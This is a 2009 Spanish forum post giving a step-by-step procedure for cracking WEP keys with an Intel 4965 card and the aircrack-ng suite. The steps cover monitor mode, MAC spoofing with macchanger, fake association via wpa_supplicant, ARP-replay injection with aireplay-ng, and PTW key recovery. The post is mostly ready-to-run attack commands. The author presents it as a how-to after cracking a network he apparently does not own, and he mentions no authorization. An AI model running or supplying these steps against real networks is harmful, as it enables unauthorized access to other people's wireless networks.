Seguridad Wireless - Wifi

Suite Seguridad Wireless => Manuales de Wifislax & Wifiway => Mensaje iniciado por: ChimoC en 04-03-2009, 09:57 (Miércoles)

Título: Inyectar con 4965 by Jaco, Bht Sata y Dexter Back
Publicado por: ChimoC en 04-03-2009, 09:57 (Miércoles)

Esto es un Copy/paste de este hilo, he puesto by Jaco, Bht Sata y Dexter Back... si me dejo a alguien en el tintero... pido disculpas (y enviadme un IM)  >:D


https://foro.seguridadwireless.net/live-cd-wifiway-1-0-renovation-kde/inyectar-con-4965/

--------------------------------------------------


Bueno antes de nada tengo que dar las gracias a todas las personas de que han contribuido en este hilo porque gracias a ellos he logrado sacar mi primera wep no perteneciente a una WLAN_XX.  ;D

Bueno respecto al post anterior que he hecho me constesto yo mismo ya que seguro que ha alguien le sirve de ayuda:

Los dos comandos que he puesto son perfectamente válidos (en la version actual de wifiway), no obstante es mejor usar aircrack-ng -z ficherodecaptura.cap porque con el otro tienes que ponerle la ruta ubicando el .cap. Personalmente yo uso esto: aircrack-ng -z *.cap  asi me quito de escribir el nombre del archivo de captura y además uso el aircrack-ptw ( que para eso es la opción -z). Además de que con la opción -z, personalmente he sacado la clave en 0 segundos (con 30.000 IV's como podeis ver en la captura mas abajo), mientras que sin ella dura mucho mas.

En un humilde intento por ayudar a los que están como yo estaba antes, voy a explicar los pasos que he seguido detalladamente:

-------------------------------------------------------------------------------------------------------------------------------

1º Arranco wifiway, entro en modo gráfico. Abro el airodump y miro que red voy a Auditar, y copio en un .txt aparte toda la info.

2º airmon-ng start wlan0 CHANNEL

3º Creo el wpa.conf

Código:

network={
        ssid="ESSID"
        key_mgmt=NONE
        bssid=BSSID
        wep_key0="232323343478787"
}

3º ifconfig wlan0 down

4º macchanger -m 00:11:22:33:44:55 wlan0

5º ifconfig wlan0 up

6º wpa_supplicant -c/root/wpa.conf -Dwext -iwlan0

(http://img122.imageshack.us/img122/4674/asociacionmodqq3.png)

Como podeis ver al primera vez que puse el comando me salió el dichoso bucle infinito: Failed to iniciate AP scan ...
Pero hize Ctrl+C y volvi a poner el mismo comando y ya me asoció, podeis ver lo de CONNECTED.

7º airodump-ng -w dexter-back -c CHANNEL mon0

(http://img244.imageshack.us/img244/1204/airodumpmodsg1.png)

8º aireplay-ng -3 -b MAC DEL AP -h 00:11:22:33:44:55 mon0

(http://img377.imageshack.us/img377/2811/aireplaymodpd5.png)

9º aircrack-ng -z *.cap

10º KEY FOUND!

(http://img357.imageshack.us/img357/5374/aircrackmodjm1.png)


NOTA: Personalmente me comienza a inyectar 2 ó 3 minutos después de ejecutar el aireplay. Sobre el tema de que si estas muy lejos no puedes inyectar.